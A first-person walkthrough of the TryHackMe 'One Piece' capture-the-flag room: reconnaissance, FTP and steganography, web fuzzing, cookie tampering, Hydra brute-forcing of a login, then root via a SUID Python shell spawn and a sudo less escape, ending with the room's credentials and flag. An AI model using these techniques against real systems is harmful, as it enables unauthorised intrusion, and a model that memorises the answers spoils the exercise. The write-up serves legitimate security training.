TryHackMe: One Piece Room Walkthrough
Complete walkthrough of the One Piece room on TryHackMe. Anonymous FTP, steganography, multi-layer cipher decoding with CyberChef, custom Gobuster wordlists, and Python SUID privilege escalation.
Overview
“I’m gonna be the Pirate King!” - Monkey D. Luffy
Room: One Piece
Platform: TryHackMe
Difficulty: Medium
Author: A One Piece fan, for One Piece fans
This room was one of the most fun and creative CTFs I have ever worked through. Every single challenge, island, and credential clue is woven directly into the anime lore.
From finding the first Road Poneglyph hidden inside the Whale Tree on Zou via anonymous FTP, to decoding through six layers of ciphers in CyberChef, to battling Blackbeard on Laugh Tale, it was an absolute blast.
Here is my complete voyage to becoming the Pirate King.
1. Initial Reconnaissance
I started by running a full Nmap scan to enumerate open ports and services:
1
sudo nmap -A 10.49.138.101
Results:
| Port | Service | Version |
|---|---|---|
| 21/tcp | FTP | vsftpd 3.0.3 |
| 22/tcp | SSH | OpenSSH 7.6p1 Ubuntu |
| 80/tcp | HTTP | Apache httpd 2.4.29 |
Key finding: Anonymous FTP login is enabled, and there is already a visible file welcome.txt in the FTP root.
2. FTP Enumeration: Zou Island (1st Road Poneglyph)
I logged into FTP using anonymous credentials:
1
2
3
ftp 10.49.138.101
# Username: anonymous
# Password: <blank>
Running ls -al (using -al is critical because standard ls hides dot-files) revealed a hidden directory:
1
2
drwxr-xr-x 2 0 0 4096 Jul 26 2020 .the_whale_tree
-rw-r--r-- 1 0 0 187 Jul 26 2020 welcome.txt
In One Piece lore, the Whale Tree on Zou island hides the first Road Poneglyph. The room creator stayed completely true to the story!
Navigating into .the_whale_tree and listing its contents:
1
2
ftp> cd .the_whale_tree
ftp> ls -al
I discovered two hidden files:
.road_poneglyph.jpeg.secret_room.txt
I downloaded both using binary mode so the image wouldn’t corrupt:
1
2
3
4
ftp> binary
ftp> get .secret_room.txt
ftp> get .road_poneglyph.jpeg
ftp> exit
Reading .secret_room.txt showed a dialogue between Inuarashi, Nekomamushi, and Luffy about the Road Poneglyphs, confirming the tree name: the Whale Tree of Zou.
Next, I checked the JPEG image for hidden steganographic data:
1
2
steghide extract -sf .road_poneglyph.jpeg
# Passphrase: <blank>
Leaving the passphrase empty worked! It extracted a large encoded string: the 1st Road Poneglyph. I saved it in my notes for later.
3. Web Enumeration: The New World
I opened http://10.49.138.101 in my browser. The page was titled “New World”.
Viewing the page source (Ctrl+U) revealed a hidden HTML comment:
1
<!--J5VEKNCJKZEXEUSDJZEE2MC2M5KFGWJTJMYFMV2PNE2UMWLJGFBEUVKWNFGFKRJQKJLUS5SZJB...-->
Decoding this Base32 string revealed a hint: there are 3472 possible locations for the Log Pose, meaning we needed a custom wordlist.
4. Finding the Log Pose
Searching GitHub for a repository named LogPose led directly to a custom wordlist with exactly 3472 entries. I grabbed the wordlist and fired up Gobuster:
1
gobuster dir -u http://10.49.138.101 -w LogPose.txt -x php,html,txt
Gobuster found the hidden path: /dr3ssr0s4.html (Dressrosa!).
5. Dressrosa: The Rabbit Hole
Navigating to http://10.49.138.101/dr3ssr0s4.html displayed an image called rabbit_hole.png containing encoded strings, a deliberate rabbit hole by the creator.
The real clue was tucked away in the CSS file:
1
curl -s http://10.49.138.101/css/style.css
Inside the stylesheet was a reference to: ../king_kong_gun.jpg.
I downloaded the image and inspected its metadata with exiftool:
1
2
wget http://10.49.138.101/king_kong_gun.jpg
exiftool king_kong_gun.jpg
The Comment field contained:
1
Doflamingo is /ko.jpg
I downloaded ko.jpg and ran strings on it:
1
strings ko.jpg | tail -n 20
There was the real destination:
1
Congratulations, this is the Log Pose that should lead you to the next island: /wh0l3_c4k3.php
6. Whole Cake Island: Big Mom (2nd Road Poneglyph)
Visiting http://10.49.138.101/wh0l3_c4k3.php brought up a text input form. The page hint said “Big Mom likes cakes”.
Checking the browser cookies in DevTools (Storage -> Cookies) revealed:
| Name | Value |
|---|---|
| cookie | NoCakeForYou |
I changed the cookie value to CakeForYou and sent a POST request:
1
2
3
curl -X POST http://10.49.138.101/wh0l3_c4k3.php \
-d "text_input=cake" \
--cookie "cookie=CakeForYou"
Success! The response gave me the 2nd Road Poneglyph along with a redirect to the next island: /r4nd0m.html.
7. Random Island: Buggy’s Games
The page /r4nd0m.html presented two mini-games from Buggy the Clown:
- Brick Breaker
- Brain Teaser
Looking at the JavaScript source code of brain_teaser.js:
1
curl -s http://10.49.138.101/buggy_games/brain_teaser.js
Inside the JavaScript logic, there was a hidden assignment:
1
document.getElementById('back').textContent = "Log Pose: /0n1g4sh1m4.php"
The Log Pose was hidden on the back face of the 3D cube!
8. Onigashima: Kaido (3rd Road Poneglyph)
Navigating to /0n1g4sh1m4.php showed two options: a login form and a file upload. The page claimed “Speaking about brute force, Kaido is unbeatable”.
I downloaded kaido.jpeg from the page and cracked its passphrase using stegseek:
1
stegseek kaido.jpeg /usr/share/wordlists/rockyou.txt
It cracked immediately: passphrase imabeast (Kaido of the Beasts!).
The extracted file contained:
1
Username: K1ng_0f_th3_B3@sts
I used Hydra to brute-force the password against the login form:
1
2
hydra -l K1ng_0f_th3_B3@sts -P /usr/share/wordlists/rockyou.txt 10.49.138.101 http-post-form \
"/0n1g4sh1m4.php:user=^USER^&password=^PASS^&submit_creds=Login:ERROR"
Hydra found the password, allowing me to log in and claim the 3rd Road Poneglyph.
9. The Last Road Poneglyph: Hidden in Plain Sight
The page stated that the location of the 4th Poneglyph was “unspecified”.
I decided to try visiting that literally in the URL:
1
http://10.49.138.101/unspecified
It loaded right away with the 4th and final Road Poneglyph! Using the word “unspecified” as the actual web path was hilarious.
10. Decoding the Poneglyphs: SSH Credentials
With all four Road Poneglyphs collected, I concatenated them and loaded the combined ciphertext into CyberChef.
It took a 6-layer decoding recipe to break through:
1
Base32 -> Morse Code -> Binary -> Hex -> Base58 -> Base64
The final output decrypted into our SSH credentials:
1
2
Username: M0nk3y_D_7uffy
Password: 1_w1ll_b3_th3_p1r@t3_k1ng!
11. Laugh Tale: Initial Access
I logged into SSH with Luffy’s credentials:
1
ssh M0nk3y_D_7uffy@10.49.138.101
We landed on the island of Laugh-Tale! Reading laugh_tale.txt revealed that Marshall D. Teach (Blackbeard) was also on the island, setting up the final confrontation for root.
12. Privilege Escalation: Luffy vs Teach
Step 1: SUID Binary to Pivot Users
I looked for SUID binaries:
1
find / -perm -4000 2>/dev/null
One custom binary stood out immediately:
1
/usr/bin/gomugomunooo_king_kobraaa
Gum Gum King Cobra! Running it launched a Python 3.6 interpreter owned by the user 7uffy_vs_T3@ch.
I spawned a privileged shell under that user:
1
/usr/bin/gomugomunooo_king_kobraaa -c 'import os; os.execl("/bin/sh","sh","-p")'
Now running as 7uffy_vs_T3@ch!
Step 2: Sudo Misconfiguration to Root
Next, I checked sudo permissions:
1
sudo -l
Output:
1
2
User 7uffy_vs_T3@ch may run the following commands on Laugh-Tale:
(ALL) /usr/local/bin/less
Checking permissions on /usr/local/bin/less: it was world-writable (-rwxrwx-wx)!
We can exploit this either by appending a reverse shell payload to the file, or by using the built-in GTFOBins escape inside less:
1
sudo /usr/local/bin/less /etc/profile
Once inside less, typing:
1
!/bin/bash
Broke straight into a root shell:
1
2
root@Laugh-Tale:~# whoami
root
13. Root: Finding the One Piece
With root access, I searched the filesystem for the final treasure:
1
2
find / -name "*piece*" 2>/dev/null
cat /usr/share/mysterious/on3_p1ec3.txt
1
One Piece: S3cr3ts_0f_tH3_W0rlD_&_0f_Th3_P@st$
Just like in the anime, the One Piece was the secrets of the world and its past!
Summary of the Journey
| Phase | Discovery / Action | Tool |
|---|---|---|
| Recon | Open ports 21, 22, 80 | Nmap |
| Zou | Anonymous FTP, extracted 1st Poneglyph | vsftpd, steghide |
| Web | Base32 comment hint | DevTools |
| Log Pose | Fuzzed custom 3472 paths | Gobuster + LogPose.txt |
| Dressrosa | Exiftool metadata and strings in image | exiftool, strings |
| Whole Cake | Cookie manipulation (CakeForYou) | curl |
| Buggy’s Games | Cube back face in JS code | curl |
| Onigashima | Cracked steghide and Hydra brute-force | stegseek, Hydra |
| 4th Poneglyph | Literal /unspecified path | Browser |
| Decoding | 6-layer cipher chain to get SSH creds | CyberChef |
| Privesc 1 | Custom SUID binary (gomugomunooo_king_kobraaa) | Python os.execl |
| Privesc 2 | Sudo /usr/local/bin/less escape | GTFOBins |
| One Piece | Flag in /usr/share/mysterious/ | cat |







